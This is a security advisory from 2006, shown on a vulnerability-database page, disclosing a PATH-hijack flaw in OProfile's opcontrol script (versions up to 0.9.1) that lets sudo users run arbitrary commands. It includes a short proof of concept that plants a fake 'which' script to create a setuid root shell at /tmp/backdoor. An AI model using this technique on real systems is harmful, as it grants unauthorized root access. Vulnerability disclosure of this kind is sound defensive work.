Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

oprofile.txt

🗓️ 08 Feb 2006 00:00:00Reported by Luis Miguel Ferreira da SilvaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

OProfile - System-wide Linux Profiler with Security Fla

Code
`Hello all,  
  
I recently audited a box with a software called OProfile  
(http://oprofile.sourceforge.net/).  
  
"OProfile is a system-wide profiler for Linux systems, capable of profiling all  
running code at low overhead. OProfile is released under the GNU GPL.  
It consists of a kernel driver and a daemon for collecting sample data, and  
several post-profiling tools for turning data into information.  
OProfile leverages the hardware performance counters of the CPU to enable  
profiling of a wide variety of interesting statistics, which can also be used  
for basic time-spent profiling. All code is profiled: hardware and software  
interrupt handlers, kernel modules, the kernel, shared libraries, and  
applications.  
OProfile is currently in alpha status; however it has proven stable over a large  
number of differing configurations; it is being used on machines ranging from  
laptops to 16-way NUMA-Q boxes. As always, there is no warranty. "  
  
At least one of the scripts that ships with this software (opcontrol) has a  
security flaw which enables a user to run arbitrary commands.  
  
The script itself isnt suid root *but*, to take full advantage of some of the  
features the software has, a lot of administrators give 'sudo' privileges to  
that script.  
  
Whoever coded the script tried protecting it against executing binaries out of a  
safe PATH by defining one on line 1416:  
PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin  
  
The problem is that this script does not check where the 'which' or 'dirname'  
binary is executed from on line 1413/1414.  
  
This enables a malicious user to execute arbitrary code by using the following  
pseudo'exploit':  
cat > which  
#!/bin/sh  
/bin/cp /bin/bash /tmp/backdoor  
/bin/chmod 6755 /tmp/backdoor  
^C  
set PATH="."  
/usr/bin/sudo /usr/local/bin/opcontrol  
  
Vulnerable: <= oprofile-0.9.1  
  
I contacted the developer(s) and got the following response:  
"Do not trust admin privileges to unaudited code" - indeed these are words of  
wisdom :o)  
  
Apparently giving sudo to oprofile is a very common practice [Take RedHat for  
instance -> http://www.redhat.com/magazine/012oct05/features/oprofile/ ].  
  
Best regards,  
+---------------------------------  
| Luís Miguel Ferreira da Silva  
| Unidade de Qualidade e Segurança  
| Centro de Informática  
| Professor Correia Araújo  
| Faculdade de Engenharia da  
| Universidade do Porto`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Feb 2006 00:00Current
oprofilelinuxprofilersecurityflawsudoredhat
31